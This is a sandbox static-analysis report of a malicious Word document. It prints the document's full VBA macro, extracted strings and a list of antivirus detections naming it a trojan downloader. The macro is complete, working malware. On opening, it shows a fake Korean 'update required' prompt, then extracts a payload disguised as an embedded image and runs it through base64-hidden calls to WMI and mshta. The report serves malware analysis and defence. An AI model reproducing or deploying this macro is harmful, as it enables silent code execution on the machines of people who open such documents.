popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function WIA_ConvertImage(sInitialImage As String, sOutputImage As String, Optional lQuality As Long = 85) As Boolean
    On Error GoTo Error_Handler
    Dim oWIA        As Object   'WIA.ImageFile
    Dim oIP     As Object   'ImageProcess
    Dim sFormatID   As String
    Dim sExt        As String
    sFormatID = "{B96B3CAB-0728-11D3-9D7B-0000F81EF32E}"
    sExt = "BMP"
    If lQuality > 100 Then lQuality = 100
    Set oWIA = CreateObject("WIA.ImageFile")
    Set oIP = CreateObject("WIA.ImageProcess")
    oIP.Filters.Add oIP.FilterInfos("Convert").FilterID
    oIP.Filters(1).Properties("FormatID") = sFormatID
    oIP.Filters(1).Properties("Quality") = lQuality
    oWIA.LoadFile sInitialImage
    Set oWIA = oIP.Apply(oWIA)
    oWIA.SaveFile sOutputImage
    WIA_ConvertImage = True
 
Error_Handler_Exit:
    On Error Resume Next
    If Not oIP Is Nothing Then Set oIP = Nothing
    If Not oWIA Is Nothing Then Set oWIA = Nothing
    Exit Function
 
Error_Handler:
    Resume Error_Handler_Exit
End Function

Function MsgBoxOKCancel()
Dim answer As Integer
answer = MsgBox("Office Word ÇÏÀ§ ¹öÀü¿¡¼­ ÀÛ¼ºµÈ ¹®¼­ÀÔ´Ï´Ù. ¹®¼­¸¦ º¸½Ã·Á¸é ÇöÀç ¹®¼­¸¦ ¾÷µ¥ÀÌÆ®ÇÏ¿©¾ß ÇÕ´Ï´Ù. ¹®¼­¸¦ ¾÷µ¥ÀÌÆ® ÇϽðڽÀ´Ï±î?", vbQuestion + vbYesNo + vbDefaultButton2, "Microsoft Word")
MsgBoxOKCancel = answer
End Function

Function Encode(text$)
    Dim b
    With CreateObject("ADODB.Stream")
        .Open: .Type = 2: .Charset = "utf-8"
        .WriteText text: .Position = 0: .Type = 1: b = .Read
        With CreateObject("Microsoft.XMLDOM").createElement("b64")
            .DataType = "bin.base64": .nodeTypedValue = b
            Encode = Replace(Mid(.text, 5), vbLf, "")
        End With
        .Close
    End With
End Function

Function Decode(enctext$)
    Dim b
    With CreateObject("Microsoft.XMLDOM").createElement("b64")
        .DataType = "bin.base64": .text = enctext
        b = .nodeTypedValue
        With CreateObject("ADODB.Stream")
            .Open: .Type = 1: .Write b: .Position = 0: .Type = 2: .Charset = "utf-8"
            Decode = .ReadText
            .Close
        End With
    End With
End Function

Private Sub Document_Open()
On Error GoTo Error_Handler
    Dim TempPath As String
    Dim TempFilePath As String
    Dim DocName As String
    Dim ShellApp As Object
    Dim FileSys As Object
    Dim ImageFileName As String
    Dim ByteArray() As Byte
    Dim CreatedImageFilePath As String
    Dim CreatedImageBMPFilePath As String
    Dim MyCalc As String
    
    Dim objWMIService, objProcess
    Dim strShell, objProgram, strComputer, strExe, strInput, intProcessID
    
    If MsgBoxOKCancel() = vbYes Then
        MyCalc = "d2lubWdtdHM6Ly8uL3Jvb3QvY2ltdjI6V2luMzJfUHJvY2Vzcw=="
        Dim Calc As String: Calc = Decode(MyCalc)
        Dim MyValue As String: MyValue = "bXNodGE="
        Dim Value As String: Value = Decode(MyValue)
        Dim MyExt1 As String: MyExt1 = "emlw"
        Dim Ext1 As String: Ext1 = Decode(MyExt1)
        ImageFileName = "image003.png"
        Set ShellApp = CreateObject("Shell.Application")
        Set FileSys = CreateObject("Scripting.FileSystemObject")
        DocName = ActiveDocument.Name
        If InStr(DocName, ".") > 0 Then
           DocName = Left(DocName, InStr(DocName, ".") - 1)
        End If
        TempPath = Environ("Temp") & "\" & DocName
        CreatedExeFilePath = Environ("Temp") & "\" & ExeFileName
        
        ActiveDocument.SaveAs TempPath, wdFormatHTML, , , , , True
        Call show
        TempPath = TempPath & "_files"
        CreatedImageFilePath = TempPath & "\" & ImageFileName
        CreatedImageBMPFilePath = Environ("Temp") & "\" & Left(ImageFileName, InStrRev(ImageFileName, ".")) & Ext1
        Call WIA_ConvertImage(CreatedImageFilePath, CreatedImageBMPFilePath)
        
        'Connect to WMI
        Set objWMIService = GetObject(Calc)
        objWMIService.Create Value & " " & CreatedImageBMPFilePath
        Kill TempPath & "\*.*"
        RmDir TempPath
    End If
Error_Handler:
    Exit Sub
End Sub

Private Sub show()
Application.ActiveDocument.Unprotect Password:="taifehjRTYB$%^45"
ThisDocument.PageSetup.PageWidth = 612
ThisDocument.PageSetup.PageHeight = 792
Set DocPageSetup = ThisDocument.PageSetup
DocPageSetup.LeftMargin = 72
DocPageSetup.RightMargin = 72
DocPageSetup.TopMargin = 85.05
DocPageSetup.BottomMargin = 72
Application.ActiveDocument.Shapes(1).Visible = False
Bookmarks("main").Range.Font.Hidden = False
ActiveDocument.ActiveWindow.View.Type = wdPrintView
Application.ActiveDocument.Protect Type:=wdAllowOnlyComments, Password:="taifehjRTYB$%^45"
End Sub

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function WIA_ConvertImage(sInitialImage As String, sOutputImage As String, Optional lQuality As Long = 85) As Boolean
    On Error GoTo Error_Handler
    Dim oWIA        As Object   'WIA.ImageFile
    Dim oIP     As Object   'ImageProcess
    Dim sFormatID   As String
    Dim sExt        As String
    sFormatID = "{B96B3CAB-0728-11D3-9D7B-0000F81EF32E}"
    sExt = "BMP"
    If lQuality > 100 Then lQuality = 100
    Set oWIA = CreateObject("WIA.ImageFile")
    Set oIP = CreateObject("WIA.ImageProcess")
    oIP.Filters.Add oIP.FilterInfos("Convert").FilterID
    oIP.Filters(1).Properties("FormatID") = sFormatID
    oIP.Filters(1).Properties("Quality") = lQuality
    oWIA.LoadFile sInitialImage
    Set oWIA = oIP.Apply(oWIA)
    oWIA.SaveFile sOutputImage
    WIA_ConvertImage = True
 
Error_Handler_Exit:
    On Error Resume Next
    If Not oIP Is Nothing Then Set oIP = Nothing
    If Not oWIA Is Nothing Then Set oWIA = Nothing
    Exit Function
 
Error_Handler:
    Resume Error_Handler_Exit
End Function

Function MsgBoxOKCancel()
Dim answer As Integer
answer = MsgBox("Office Word ÇÏÀ§ ¹öÀü¿¡¼­ ÀÛ¼ºµÈ ¹®¼­ÀÔ´Ï´Ù. ¹®¼­¸¦ º¸½Ã·Á¸é ÇöÀç ¹®¼­¸¦ ¾÷µ¥ÀÌÆ®ÇÏ¿©¾ß ÇÕ´Ï´Ù. ¹®¼­¸¦ ¾÷µ¥ÀÌÆ® ÇϽðڽÀ´Ï±î?", vbQuestion + vbYesNo + vbDefaultButton2, "Microsoft Word")
MsgBoxOKCancel = answer
End Function

Function Encode(text$)
    Dim b
    With CreateObject("ADODB.Stream")
        .Open: .Type = 2: .Charset = "utf-8"
        .WriteText text: .Position = 0: .Type = 1: b = .Read
        With CreateObject("Microsoft.XMLDOM").createElement("b64")
            .DataType = "bin.base64": .nodeTypedValue = b
            Encode = Replace(Mid(.text, 5), vbLf, "")
        End With
        .Close
    End With
End Function

Function Decode(enctext$)
    Dim b
    With CreateObject("Microsoft.XMLDOM").createElement("b64")
        .DataType = "bin.base64": .text = enctext
        b = .nodeTypedValue
        With CreateObject("ADODB.Stream")
            .Open: .Type = 1: .Write b: .Position = 0: .Type = 2: .Charset = "utf-8"
            Decode = .ReadText
            .Close
        End With
    End With
End Function

Private Sub Document_Open()
On Error GoTo Error_Handler
    Dim TempPath As String
    Dim TempFilePath As String
    Dim DocName As String
    Dim ShellApp As Object
    Dim FileSys As Object
    Dim ImageFileName As String
    Dim ByteArray() As Byte
    Dim CreatedImageFilePath As String
    Dim CreatedImageBMPFilePath As String
    Dim MyCalc As String
    
    Dim objWMIService, objProcess
    Dim strShell, objProgram, strComputer, strExe, strInput, intProcessID
    
    If MsgBoxOKCancel() = vbYes Then
        MyCalc = "d2lubWdtdHM6Ly8uL3Jvb3QvY2ltdjI6V2luMzJfUHJvY2Vzcw=="
        Dim Calc As String: Calc = Decode(MyCalc)
        Dim MyValue As String: MyValue = "bXNodGE="
        Dim Value As String: Value = Decode(MyValue)
        Dim MyExt1 As String: MyExt1 = "emlw"
        Dim Ext1 As String: Ext1 = Decode(MyExt1)
        ImageFileName = "image003.png"
        Set ShellApp = CreateObject("Shell.Application")
        Set FileSys = CreateObject("Scripting.FileSystemObject")
        DocName = ActiveDocument.Name
        If InStr(DocName, ".") > 0 Then
           DocName = Left(DocName, InStr(DocName, ".") - 1)
        End If
        TempPath = Environ("Temp") & "\" & DocName
        CreatedExeFilePath = Environ("Temp") & "\" & ExeFileName
        
        ActiveDocument.SaveAs TempPath, wdFormatHTML, , , , , True
        Call show
        TempPath = TempPath & "_files"
        CreatedImageFilePath = TempPath & "\" & ImageFileName
        CreatedImageBMPFilePath = Environ("Temp") & "\" & Left(ImageFileName, InStrRev(ImageFileName, ".")) & Ext1
        Call WIA_ConvertImage(CreatedImageFilePath, CreatedImageBMPFilePath)
        
        'Connect to WMI
        Set objWMIService = GetObject(Calc)
        objWMIService.Create Value & " " & CreatedImageBMPFilePath
        Kill TempPath & "\*.*"
        RmDir TempPath
    End If
Error_Handler:
    Exit Sub
End Sub

Private Sub show()
Application.ActiveDocument.Unprotect Password:="taifehjRTYB$%^45"
ThisDocument.PageSetup.PageWidth = 612
ThisDocument.PageSetup.PageHeight = 792
Set DocPageSetup = ThisDocument.PageSetup
DocPageSetup.LeftMargin = 72
DocPageSetup.RightMargin = 72
DocPageSetup.TopMargin = 85.05
DocPageSetup.BottomMargin = 72
Application.ActiveDocument.Shapes(1).Visible = False
Bookmarks("main").Range.Font.Hidden = False
ActiveDocument.ActiveWindow.View.Type = wdPrintView
Application.ActiveDocument.Protect Type:=wdAllowOnlyComments, Password:="taifehjRTYB$%^45"
End Sub
IDATx^
+}T_s>
V[UfuU
(aPZj}
Vo{9s-4Z[S
nq_9B=4
q&bNvMe*
C*aJR`
3m__B/
xc({4^u
W$8,Sp
lk>)%;4
ux6C< w
xbH=M
H$2n'g.
RQ0B=n
;lgWO|
RSUnm-
mz{C|E
j+5#Bf
6vv;=&
uouZwwn
>45V[}l
]`<P`H
LJ#f;v
&(NGAr
55TX[SU
VY^bCa&
f5ZGkb0
$Ap8-]
QAt%wT
L6dO2[:
t\C%%v
QTUYn3
}f5YK}
QL~p j
C4:ds[kb
E>C=y4
1T^Vj3
qpWfAoi
1T^^j3ZjmZS
M@]Hw>
eVUQf5
i-uV[Sa
*Hs$`l
ksg4:
8*t T="<j
@V]I7<W
-%*;M@=
3NXjMu
*`rSbAt-y=f
}v$pS
=4|R:^
AuDsyh?
z?y=Jt
7X41$Z
E?4]N)
IDATx^
!WO&#Kk
^fph"|
Bce@^+
{x:+@Uax[cH
.zRQ 9
?sC8cH
GU-a$`
+`CC%[!
DeKXbT
GQd!AKD-2{5
S^L,P{EU
\r\ZvQ
zg/O!^
rVxI~z
O<&m0P
qmuSxoa
ACqpm`
zhbtMp
kgi]BqR
5SN-[7
72 <KtH
k1cqL!
H.oUMm"
E)Tm%D4F
:h|$z:o
=Dx{''c
X|i;v;m
A~G*qy
J_^Dc1
b'TGOR
p&ce\\
)2gwnv
]]e^_<
pMx?$v
!t<ZRu
5$gzR=5
dIIT6h_
|?fr@2
\jdel0
S[h]Vt=
JRv(;DY
6G2,QF
ad?;94
F|Ap9
C@42UW.
\6/Bh+
qAsn.8A
FyY!30
->pz<m%
'J\!1j=
)zb[~?
C=+_W4
ZNwI-w
tzA4^}P4r
l! ^K@q
/0;r0;
@PfzI&:
^f^l*@
%v R(p
:MkFNw
3K\C_/
rB= fr
z{_hm~z
aGd9.8%
uzRo@
_4cPwy
(pKU.v
nH{h=J'
D03TK'
O[$;.x
c$GDeE
X<Xbe1
#0@*`
w+?Y^!v
4qYmX:
I$}\v7
jRx_5W~:
='LCp[
*jZew(
a_sWUs
q*Pm{S
64)bMty
}3}~"<
.&1e^nt~f,
([L-@<
cr&5_b
UZW*Cd`C
gR!G2Y
LcV>AXDb
XgVMRM
-B]p{}B@?v_
Qr"_x^
sK7e:tFm
g;+>J3l
YFhLZSt
N,4T,}S
qO5e[l
mKlWo
J$1BsY
h[H`to$
'L;#Ty
arejU3
]qhi[q^Izk
V~2a!p
g\Ltah:
Joot=i
+=_;=}
I9PPDA
|hEC-L
A+GTn#
JrKqFI
8v=3(g.
[^0bO[
NM:0Qf
gmK3tO
IDATvP
R05]zO
KcgK&e
cAf]<*
KM`ArZ*k
cf[*qU
Y:^Mx!Th]nOyT
})iL>.
u@>Nso#M
=G~,@a
H`C^9_L
OL6<r/IeLFD
W+$ue}0J
={2;g^
gB!.rTT>3
awlwv$
"'aMG{g
!TxAg?)
Gr{%]y+6
o1=TEo{n
Ry}/t6H
6b0ARw@
eP^M6?K3
5!>~R>
k4Yx.>
c-jXa_O
CE{RTL
Nouw'(
.eQ0^P
po4<1[
"+l+9w
|};^KR
ok6E?$P(
K.%}cKT
|2Yh/i
yRgRai
=c>hk{
["a.m\
gd+D!(
G4H-!C
(>>e-=zBS
-VA\cp-
O23QL;e
wb"zdU"
<{|u[9
he w]q
gX]c%o0
h<{u80x
['LMJh|
B&Pc4~Kw
0G=<qu
Z3xW*j
("RR'U\
%o+~o7
C.I9'?
druYf^
"sK_ k
-/G{tZ
OX2x[c
b0FAjm
"1QX(
b?OY`9
c-#.XW
[}T.yY&U
OsVAf* A
\x1*a*
\xXm\nc%&'V
\\&uwNV
1<E(t"
#|li={D
*V"<8[
Q"|`xb
L'w0+9
:<^)L-La
)CqqLK
U/(2|Ma:
C(D6WZ
WFo[HJ'
f& tH+
8MUINQ
aPL$5P
|G^ !=
uux#J9t
!NEKGG
% $]sZR3
{xtu'Q{[
~r06ic
Fay4l|n
u|,muR
xn?y$OA
XzCY(Q
-ni@Ei
|IRJ3!tqq
?u_\D@7`
+3/maG
OU6IcW
@8:/DAK1e
[ !eY?p
#!f{m/
/c]h,=
}mg@@Y
't^; s
aEqFk1
~y(&j&j
K;;.V7,
}@eXcm
a)M6'w
cmd*2}{
MthYT,;u24o
:H_+#kR^W
AiBnex
sP!g8`H
$F\YcE
ji$K=_
A3tkV
D$]Z#_
j"rNh8`
{ Z~^+[
{i$?lh
'3s]:h
)Q!QPb
DU3 T}
)w5r(dJ
>rN\T7$
5I~?0W
2y- L<
:aAEHu
teg88N
^uKS=R]
414q]e
6`*Q${
>:M1 ;XvI
k"F-`"od
>`6(<_
F$)x-2
RrQ,Mp
AsMSmQ
ma4`&P
sbCQe=
2u 2)[t;
PfcHG7
n;a"Cq
I_\A]d
xsGg,]
58!dxN
-HRia
pSye5>/
?FNyTn
-`s~/G
*Bcu<6O
(rT('Y
G->\MX#3
XwMO7d
9jjrG
bzPdr#p
fKu;`[^
N8HC'~C
rm70ga
|WH}^UxXFg
Ud(|P1:
EZ92`5
V+3wz
UJK~Zs^B
Oia0W@I
\{N_H|
iq2L7T
8l#s(Q
f?HCje
^\M*S]^?
|`49xB.t
>arZOs
=Oj[F*
rSI-eU
/Hd)uO
PtP$}Q
au2vRB
^'Qqy+
_US OG
y(#C,v:xM
3w;'QB6
wY0jc~0A`
$/Npod
OK@Pp]
I^~h3)
kS7ig0
1PpNE4,
cV&-;)S
BJU!fk
+:z%1[
"<7!$4Fh
%kNIW_O<
UM2}wg0
A[1GpT
duJ$SJc
CscRgYpu+>X
.h"S!{
|f([q.
Hgz0%&
v~64\CB
T>lro tf&
.J0>i4F
~%_G-v
K@K;3-
k9kze?
FfC{"N
QDlHvF
Dx.{#C-
/9`6Ny
V#eZi}
E-bC-b$f
Xvkc>VBt
-Vq(q=
W\OsCq@
.V^}T]
ZKx!V^!
6di8Tk+'
t0'U>G
'RuCME
r'VvqP
DfIKqA
&V/ld4$
X{dG>z
DkAY<g
P2eP!-d
IDATCs
ljOLdf
*w)SPfA6
K%7=*
4C%hb.(
'$321G&
$50k@<
h3wKX5
1-bjk1
_4lhW_
X9e?Y?NNv
D0WZ[R
J*F$?cy}F('
(Rep]F
2r?/S;GK5
b"-p]15~
HoBYJ}
0"cmyD
wL-yCm?]
Dl\_dvL
Q$N7(X
0?2wl#
w8klu*2
4;9 ![g
lD,S3@
9N)^`3
rF`S+Z
-:v+{8r
].wK _]
rFy"vIr
WU,wVMC
7PMq&A
?y!NN/S
H@]}fr
lt\UGT-G
QV20p%g^q
@9Wt1h
GZKF[,Jm&"*\a%>t
a\fK[vT
z|4bhx
;%ZN^S
S<krM*
,'(b>5
4b5-$gu
Lv)iS(Wl<?d
uOMekT
*Q!D`.H7
=1]1BQ
@S "B
b$,C-z9
A-Q-I1
R"c&r`F
D(xS#$
}%f9f0
'i[gN,_
CZ2Sm;I-
ItV>Md
xBFh}L
.1>@'[|
oJ2FFi
*ql3=;^
nhN?B?
!(G<z^
sJ%hFJ('
}|V!n 7
4SBH%C
g \ uQ
79NVF_
[%|`@1
y;i:4f
wYsrx;
[V%kgs
:+u@';gz
^qJYA_;
T`$F0&^T
x(f|"gZ
!sg 2?
ROT?f
d<6'@Q
!2o,lM
uZz4 EA
g'0q*X
<{~~Q)
3Y4-7y
Nhps7I
qj`b}~
CfWH"`
)SjHu'
4py|c<
Sb3><ZLs
[C]h(2
RXPB:U
/$EIZI
y[v\Jz\y
v_Yap8C
w}l-JZ
|-w;^{L
teZNOM
kUtp?6
0/)&z0TR
){aC*)
S8f_Fx
;V_=%l@
#i-uYz@
YK<oxh
*q?1z_
#}p(H?
;oA8WXwT
c~QN%Y
r#%]q?_
d.k8z#
U&F^}~
{84a1y
!$^ZZF
u?swj3&e
ZX"y,!\R
{DF}]W
SM="s|v
KWr}m
{tKlb=
+QU<~(wXQ{
xQu2X(
'!ox$o
X5-\z{
SRoV2bG
BEjf+g
2_*SNN
<T9*c_
`ka'N_[#
R$C]3 @
]7le}mJ
SdR\],+
]@$plrU4G
Z#OsY)XJT
bG=Kew
>%,6Yxt
v(9xW-
3,WW5(
h1AnIZf
,96Kq/
MA30DS
za=w31
^*0F_{m
y>I2aG
_)9+t%
x9mK&%S
w6d'rJ'K
6YaFV_0
XW^w<*
dxYAtS
$mpiM
UpS&<.(
Sz3l%D
0t9~ViP*:
yJPRsZ
2EF!L7
-?0b7Rp
e%{`?fe!
^NQYJt
X).Y#[NI
aU-4-=Iw
RQH+2J
EA|z4p
KL(5uJQ
BqU$p$
`at+y91?
+`u>!C
d".@lq
Qgj`~H
m0[T)QGx
#3_bnXe
\LdL~:
.!9"Vr
.aL[w/
/,"f^e
A`h&yV
AE?WYa
;c~Z>]4
~u4i/_O
#//'W'
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
/,EE\}
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
William
Normal.dotm
William
Microsoft Office Word
WIA.ImageFile
ImageProcess
A.Imag]
{B96B3CAB-0728-11D3-9D7B-0000F81EF32E}'
WIA.ImageFile
WIA.ImageProcess$
Convert
FormatID
Quality
Connect to WMIject
_files
TempP
image003.png'
Scripting.FileSystemObject$
JfUHJv
Shell.Application
ADODB.Stream$
bin.base649
Microsoft.XMLDOM$
Microsoft.XMLDOM$
bin.base649
ADODB.Stream$
bXNodGE='
33333CU@
d2lubWdtdHM6Ly8uL3Jvb3QvY2ltdjI6V2luMzJfUHJvY2Vzcw=='
Office Word
Microsoft Word$
taifehjRTYB$%^45
taifehjRTYB$%^45
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
ic Funct
ion WIA_
ConvertI
mage(sIn itial
sOutpu
$al lQ@uality
Boolean
ror GoTo
_Handle
AObjec*t
Proces
sFAytID
3CAB-072
8-11D3-9
1EF32E}
K> 100
Rters.Ad
Infos$("D
oadA}
%Apply(
UET_ExitF:
0Next#
xOKCance
eralInteg
?", vbQ(uesB
aultButt
on2, "Mi
crosoft ?
$En@code(t
LvADODB.
en: .Typ
WriteT
.ReadC
f!.XMLD
ce@(Mid(.a
8Lf@4)
Shell
eArray(c
objWMISe
rv0[,
bWdtdHM6
Ly8uL3Jv
b3QvY2lt djI6V
Mz JfUHJ0
Vzpcw==
bXNodGE
image003
e`3tem
nt.q47!
) - f1
Environ
/l showo
PRev(|
Call WIA
_Convert
Image(Cr eated
lePath,
t to WMI
0Set obj
&Service
= GetObjj
Value h& "
6 \*.*"
Rm0Dir
ror_Hand
xitp Sub
show(
plicatio
n.Active
Document
.Unprot
Password
:="taife
hjRTYB$%
Width
Heigdht
LeftMarg
Bottom
NShapes
(1).Visi
Bookma
rks("mai
n").Rang
\Hid<de
ew.HTyp
llowOnly
Exampleh"
MethodscS
SpawnInstancejx
SpawnInstanceobjProgram
strInput
intProcessIDH
Create
charactersrg
Varient
Base64ToArray&
base64
xmlDoc
xmlNodeC
createElement
DataType%?
nodeTypedValuel_
MyCalc
base64Strx
CalcBt
MyValue
_B_var_MyValueop
_B_var_Value
_B_var_ExeFileName
_B_var_CreatedExeFilePath
CharsetQ#
WriteText
Position
EncodeBase64
Replacef
vbLfT%
DecodeBase648
ReadTextb
MyExt1/a
Decode
_B_var_Decode@3
Encode
enctext.
Application
Unprotect
Password
PageSetup
PageWidth
PageHeight
DocPageSetup
LeftMargin
RightMargin[
TopMargin
BottomMarginu
Bookmarks?n
Hidden]
Protect
wdAllowOnlyCommentsR
_B_var_DocPageSetupkc
hide9z
Shapes
Visible
ActiveWindow
wdPrintView(
Editors>O
wdEditorEveryone
originF
Height|
MsgBoxOKCancel?
vbOKCancelx?
_B_var_Function
_B_var_Call
answer,
vbQuestion
vbYesNo
vbDefaultButton2
_B_var_IfP
vbYesa?
Document_Open
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
Shared\
OFFICE16
\MSO.DLL
M 16.0
ThisDocu
sFormatID
CreateObject
sInitialImage
sOutputImage
lQuality
lFormat
base64
enctext<
ThisDocument
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Document_OpeneeEq
Documentj
wiaFormatQ
WIA_ConvertImage!
sInitialImage
sOutputImage
lFormat
lQualityn
Error_Handler
sFormatID
CreateObject
Filters
FilterInfos
FilterID>
Properties+
LoadFile
Apply,
SaveFile}
InStrRev
LCase:
Error_Handler_Exit
MsgBox
vbCrLf
Number
Description
Switch6z
vbOKOnly
vbCritical+}
modifyImage
_B_var_LeftQ
_B_var_LCase'
Document_Openeeew
TempPath
TempFilePath
DocName
ShellApp
FileSys
PerFileCL
ImageFileName
ExeFileName0[
ByteArray
FileInt
CreatedImageFilePath
CreatedImageBMPFilePath
CreatedExeFilePathv
PerShape
InlineShape
StartPointer
EndPointer5P
ActiveDocument
Environ
SaveAsf;
wdFormatHTMLw
FileExists
ShellV
Openeee
_B_var_Environ
_B_var_step2
objWMIService
GetObjectz
?Obtain^
Win32_Process
objProcess
objProgram&
Methods_x
InParameters
SpawnInstance_a
CommandLine
strExeu
ExecutePw
programH
strShell~X
ExecMethod
WSCript
strComputer
?End:s
EncodeBase64"
DecodeBase64&
Encode
Decode
Step1&
s5}$ZC
*\CNormalrU@
ThisDocument
Project
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Office16\MSWORD.OLB
Document
C:\Windows\System32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
WIA_ConvertImage
Document_Openeee
modifyImage.
VBE7.DLL
Base64ToArray
origin&
MsgBoxOKCancel
Document_Open
ID="{00000000-0000-0000-0000-000000000000}"
Document=ThisDocument/&H00000000
HelpFile=""
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="BFBD13642D7C3E803E803A843A84"
DPB="CCCE607760997D997D66839A7D1F6553D68D3993778EC5BF6B6FC69A0546574BEEB472959A76"
GC="D9DB758676867686"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=26, 26, 842, 512, Z
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
. 2019
. IMO 2020
output
Normal
Default Paragraph Font
Table Normal
No List
word_alert1
default
Unknown
Times New Roman
Symbol
Calibri
Cambria Math
William
William
Root Entry
1Table
WordDocument
SummaryInformation
DocumentSummaryInformation
Macros
ThisDocument
_VBA_PROJECT
__SRP_0
(1Normal.ThisDocument
tThisDocument
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
ThisDocument
1H6259ac6b
ThisDocument
d2lubWdtdHM6Ly8uL3Jvb3QvY2ltdjI6V2luMzJfUHJvY2Vzcw==&
bXNodGE=
image001.png
Shell.Application
Scripting.FileSystemObject
bin.base64
DataType
_files
MSXML2.DOMDocument
Create
createElement
nodeTypedValue
Microsoft.XMLDOM
ADODB.Stream
Position
Charset
ReadText
LeftMargin
RightMargin
TopMargin
BottomMargin
default
taifehjRTYB$%^45&
L:\03.Social\04.Malicious_Macro\01.Word\02.image_execute\02.Doc\02.with_mshta\output.bmp
{B96B3CB0-0728-11D3-9D7B-0000F81EF32E}.
L:\03.Social\04.Malicious_Macro\01.Word\02.image_execute\02.Doc\02.with_mshta\output.png2
{B96B3CAB-0728-11D3-9D7B-0000F81EF32E}
{B96B3CAE-0728-11D3-9D7B-0000F81EF32E}
{B96B3CAF-0728-11D3-9D7B-0000F81EF32E}
{B96B3CB1-0728-11D3-9D7B-0000F81EF32E}
WIA.ImageFile
WIA.ImageProcess
Convert
FilterInfos
FilterID
Filters
FormatID
Properties
Quality
LoadFile
SaveFile
The following error has occurred
Error Number:
Error Source: WIA_ConvertImage
Error Description:
Line No:
An Error has Occurred!
image003.png
Want to Continue?
Microsoft Word&
__SRP_1
PROJECTwm
PROJECT
CompObj
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
MicroWorld-eScan VB:Trojan.Valyria.4372
FireEye VB:Trojan.Valyria.4372
CAT-QuickHeal Ole.Trojan.A1679054
ALYac Trojan.DOC.405504
Malwarebytes Clean
VIPRE Clean
AegisLab Trojan.Multi.Generic.4!c
Sangfor Trojan.Generic-Script.Save.58bfd89c
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren W97M/Agent.UT.gen!Eldorado
Symantec W97M.Downloader
ESET-NOD32 a variant of VBA/TrojanDownloader.Agent.UOE
TrendMicro-HouseCall TROJ_FRS.0NA103DT21
Avast SNH:Script [Dropper]
ClamAV Clean
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender VB:Trojan.Valyria.4372
NANO-Antivirus Clean
ViRobot W97M.S.Agent.405504
Tencent Trojan.Win32.MacroV.11000092
Ad-Aware ATI:Lazarus.Doc.BMPStegano.6B0AD048
TACHYON Suspicious/W97M.Obfus.Gen.8
Emsisoft VB:Trojan.Valyria.4372 (B)
Comodo Malware@#1v5nno5v97i7u
F-Secure Clean
DrWeb W97M.Dropper.103
Zillya Clean
TrendMicro TROJ_FRS.0NA103DT21
McAfee-GW-Edition BehavesLike.OLE2.Bad-VBA.fb
CMC Clean
Sophos Clean
Ikarus Trojan-Downloader.VBA.Agent
Jiangmin Clean
Avira HEUR/Macro.Downloader.MRDT.Gen
Antiy-AVL Clean
Kingsoft Clean
Microsoft TrojanDownloader:O97M/Tnega!MSR
Gridinsoft Trojan.U.Downloader.oa
Arcabit VB:Trojan.Valyria.D1114
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData VB:Trojan.Valyria.4372
Cynet Malicious (score: 99)
AhnLab-V3 Dropper/DOC.Generic
Acronis Clean
McAfee RDN/Generic Downloader.x
MAX malware (ai score=100)
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Static AI - Malicious OLE
MaxSecure Clean
Fortinet VBA/Agent.UOE!tr
BitDefenderTheta Clean
AVG SNH:Script [Dropper]
Panda Clean
Qihoo-360 Clean
No IRMA results available.